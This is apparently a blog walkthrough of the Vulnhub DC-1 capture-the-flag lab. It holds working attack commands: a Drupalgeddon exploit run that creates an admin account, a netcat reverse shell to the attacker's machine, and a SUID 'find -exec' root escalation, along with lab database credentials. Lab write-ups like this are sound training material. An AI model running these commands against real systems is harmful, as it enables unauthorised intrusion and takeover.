Walkthrough: Vulnhub - DC: 1

· by Christoph Stoettner · Read in about 5 min · (905 words)
Download and Informations
Original Description

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

Recon

root@kali:~# nmap -p- -A 10.128.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-04 12:44 EST
Nmap scan report for DC-1.stoeps.lab (10.128.1.152)
Host is up (0.00063s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42642/tcp   status
|   100024  1          49668/udp   status
|   100024  1          57477/tcp6  status
|_  100024  1          57545/udp6  status
42642/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:76:3D:59 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Drupal

searchsploit drupal 7
 ------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                       |  Path (/usr/share/exploitdb/)
 ------------------------------------------------------------------------------------------------------------------

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)    | exploits/php/webapps/34992.py
Create Admin account
root@kali:~/vulnhub/dc1# cp /usr/share/exploitdb/exploits/php/webapps/34992.py .
root@kali:~/vulnhub/dc1# dos2unix 34992.py
root@kali:~/vulnhub/dc1# ./34992.py -t http://10.128.1.152 -u stoeps -p pass
...
[!] VULNERABLE!

[!] Administrator user created!

[*] Login: stoeps
[*] Pass: pass
[*] Url: http://10.128.1.152/?q=node&destination=node

Now we can login to the drupal site and install modules, change settings and so on.

Opening netcat shell

Starting on Kali
nc -nlvp 7777
Start nc in the Drupal shell
nc -e /bin/bash 10.128.1.154 7777   (1)
1Use the Kali IP here
Then get a real tty
python -c 'import pty; pty.spawn("/bin/sh")'

Grab the flags through netcat shell and browser

Flag1

www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

Flag2

www-data@DC-1:/var/www/sites/default$ cat set
cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
...

We can extract the user and passwords from mysql db, then crack with John the ripper, but not needed as we created our own admin account. I found nothing interesting in the database.

Flag3

Article on the dashboard within Drupal.

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

Flag4

/home/flag4/flag4.txt
> cat /home/flag4/flag4.txt

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

Flag4 was readable for the user www-data, so no need to crack the password from /etc/shadow.

Final Flag

www-data@DC-1:/var/www/sites/default$ find / -perm /4000
find / -perm /4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find         (1)
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

www-data@DC-1:/var/www/sites/default$ ls -l /usr/bin/find
ls -l /usr/bin/find

bash-4.2$ find . -exec '/bin/sh' \;
find . -exec '/bin/sh' \;

# whoami
whoami
root

# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

# cd /root
cd /root

# ls
ls
thefinalflag.txt
1find can be used with -exec
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

We’re done! Funny vulnhub machine which can be solved in a short time. Seeing forward to the other eight machines of that series. Thanks @DCAU7